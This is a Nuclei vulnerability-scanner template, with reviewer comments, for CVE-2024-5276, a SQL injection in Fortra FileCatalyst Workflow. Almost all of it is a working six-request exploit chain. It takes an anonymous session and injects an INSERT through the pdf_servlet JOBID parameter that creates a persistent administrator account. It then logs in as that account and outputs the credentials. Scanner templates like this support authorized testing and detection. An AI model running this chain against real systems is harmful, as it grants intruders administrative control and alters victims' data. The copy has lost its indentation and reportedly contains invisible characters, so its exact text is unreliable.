nuclei-templates/http/cves/2024/CVE-2024-5276.yaml


# Nuclei template for CVE-2024-5276 (Fortra FileCatalyst Workflow SQL injection).
# Request flow, as laid out under `http:` below: obtain a JSESSIONID, confirm the
# anonymous-logon link is offered and follow it, send the SQL payload through the
# pdf_servlet JOBID parameter, then log in with the inserted credentials to prove
# the injection took effect. The hosting page flagged invisible Unicode characters
# somewhere in this file; they are not locatable in this view, so compare the raw
# bytes against upstream before relying on the regexes or the payload verbatim.
# NOTE(review): indentation has been lost in this copy; nesting of the keys below
# is inferred from Nuclei's template schema and should be checked against upstream.
id: CVE-2024-5276
info:
name: Fortra FileCatalyst Workflow <= v5.1.6 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data.  Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.
reference:
- https://www.tenable.com/security/research/tra-2024-25
- https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0
- https://www.fortra.com/security/advisory/fi-2024-008
- https://nvd.nist.gov/vuln/detail/CVE-2024-5276
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5276
cwe-id: CWE-20
epss-score: 0.00198
epss-percentile: 0.57788
metadata:
# max-request matches the six `raw` requests defined under `http:` below.
max-request: 6
verified: true
fofa-query: body="FileCatalyst file transfer solution, easily transfer large files"
# NOTE(review): the tag `instrusive` is misspelled. Tag-based filtering such as
# `-exclude-tags intrusive` will therefore NOT exclude this template even though it
# writes a persistent row into the application database. `sqli` is also listed
# twice. Both should be corrected upstream (which requires re-signing the digest).
tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,instrusive,sqli
variables:
ctxpath: "workflow"
# Random credentials for the account the injection creates. The password is
# stored as an upper-cased MD5 via password_enc (ENCPASSWORD column in the payload).
username: "{{randstr}}"
password: '{{randstr_2}}'
password_enc: "{{to_upper(md5(password))}}"
# The payload INSERTs a complete DOCTERA_USERS row with ADMIN=1 and SUPERADMIN=0,
# and nothing in this template deletes it afterwards: a successful run leaves a
# persistent administrative account on the target. Remove it after an authorized
# test. Fixed values in the row double as hunting indicators for defenders:
# email <username>@mydomain.local, phone 202-404-2400, LASTLOGIN 1714014839723,
# CREATION 1714013661166, PW_CREATIONDATE 1714014752270.
payload: "1';INSERT INTO DOCTERA_USERS (USERNAME, PASSWORD, ENCPASSWORD, FIRSTNAME, LASTNAME, COMPANY, ADDRESS, ADDRESS2, CITY, STATE, ALTPHONE, ZIP, COUNTRY, PHONE, FAX, EMAIL, LASTLOGIN, CREATION, PREFERREDSERVER, CREDITCARDTYPE, CREDITCARDNUMBER, CREDITCARDEXPIRY, ACCOUNTSTATUS, USERTYPE, COMMENT, ADMIN, SUPERADMIN, ACCEPTEMAIL, ALLOWHOTFOLDER, PROTOCOL, BANDWIDTH, DIRECTORY, SLOWSTARTRATE, USESLOWSTART, SLOWSTARTAGGRESSIONRATE, BLOCKSIZE, UNITSIZE, NUMENCODERS, NUMFTPSTREAMS, ALLOWUSERBANDWIDTHTUNING, EXPIRYDATE, ALLOWTEMPACCOUNTCREATION, OWNERUSERNAME, USERLEVEL, UPLOADMETHOD, PW_CHANGEABLE, PW_CREATIONDATE, PW_DAYSBEFOREEXPIRE, PW_MUSTCHANGE, PW_USEDPASSWORDS, PW_NUMERRORS) VALUES('{{to_lower(username)}}', NULL, '{{password_enc}}', '{{to_lower(username)}}FirstName', '{{to_lower(username)}}LastName', '', '', '', '', '', '', '', '', '202-404-2400', '', '{{to_lower(username)}}@mydomain.local', 1714014839723, 1714013661166, 'default', '', '', '', 'full access', '', '', 1, 0, 0, 0, 'DEFAULT', '0', 0, '0', 1, '', '', '', '', '', 0, 0, 0, '', 0, 'DEFAULT', 0, 1714014752270, -1, 0, NULL, 0);-- -"
http:
# Request 1: the landing page embeds a session id in the logon link; capture it.
- raw:
- |
GET /{{ctxpath}}/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: jsessionid
regex:
- 'logon.jsp;jsessionid=([A-Z0-9]+)'
internal: true
# Request 2: only continue when the logon page offers anonymous access
# (logonAnonymous.do) — this is the precondition for unauthenticated exploitation
# stated in the description — and capture the anonymous-logon href.
- raw:
- |
GET /{{ctxpath}}/jsp/logon.jsp;jsessionid={{jsessionid}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'logonAnonymous.do'
internal: true
extractors:
- type: regex
part: body
group: 1
name: anonurl
regex:
- 'href="(.*)" class="btn btn-outline-primary" id="logonAnonymousLink"'
internal: true
# Request 3: follow the anonymous-logon link to obtain an anonymous session.
- raw:
- |
GET {{anonurl}} HTTP/1.1
Host: {{Hostname}}
# Request 4: the injection itself, delivered in the JOBID query parameter of
# pdf_servlet. For detection: a JOBID value containing a quote and `INSERT INTO`
# on this path, shortly after an anonymous logon, is the signature of this chain.
- raw:
- |
GET /{{ctxpath}}/servlet/pdf_servlet?JOBID={{urlencode(payload)}} HTTP/1.1
Host: {{Hostname}}
# Request 5: fetch a fresh logon page without the cookie jar (disable-cookie), so
# the anonymous session from request 3 is not reused; extract the form token and
# a new session id for the verification login.
- raw:
- |
GET /{{ctxpath}}/jsp/logon.jsp HTTP/1.1
Host: {{Hostname}}
disable-cookie: true
extractors:
- type: regex
part: body
group: 1
name: fcweb_token
regex:
- 'name="FCWEB.FORM.TOKEN" value="([A-Za-z0-9]+)"'
internal: true
- type: regex
part: body
group: 1
name: jsessionid2
regex:
- 'logon.jsp;jsessionid=([A-Z0-9]+)'
internal: true
# Request 6: verify by logging in as the inserted user. The session id is set
# explicitly in the Cookie header rather than taken from the cookie jar. The
# negative matcher rejects the two failure strings; the positive matcher requires
# both the administration page title and the username in the response body.
- raw:
- |
POST /{{ctxpath}}/logon.do HTTP/1.1
Host: {{Hostname}}
Cookie: JSESSIONID={{jsessionid2}}
Content-Type: application/x-www-form-urlencoded
FCWEB.FORM.TOKEN={{fcweb_token}}&username={{to_lower(username)}}&password={{password}}&submit=Login&
disable-cookie: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'username/password are not correct'
- 'Your session timed out.'
negative: true
- type: word
part: body
words:
- '<title>FileCatalyst Workflow Administration</title>'
- '{{to_lower(username)}}'
condition: and
# The working credentials are emitted in the scan output; treat result files and
# logs from this template as sensitive and rotate/remove the account afterwards.
extractors:
- type: dsl
dsl:
- '"USER: "+ username'
- '"PASS: "+ password'
# NOTE(review): the digest below signs the file contents; any edit to this file,
# including comment-only changes, invalidates it until the template is re-signed.
# digest: 4b0a00483046022100f22dc8c52116835e08760a2476f93ba59a3bd4be7402180d8aec08b7c5f5f5a5022100e6ee803e8c6f7aeb8e6da5ce715264ff5df91e19866b9d8c9e2849220f60bd52:922c64590222798bb761d5b6d8e72950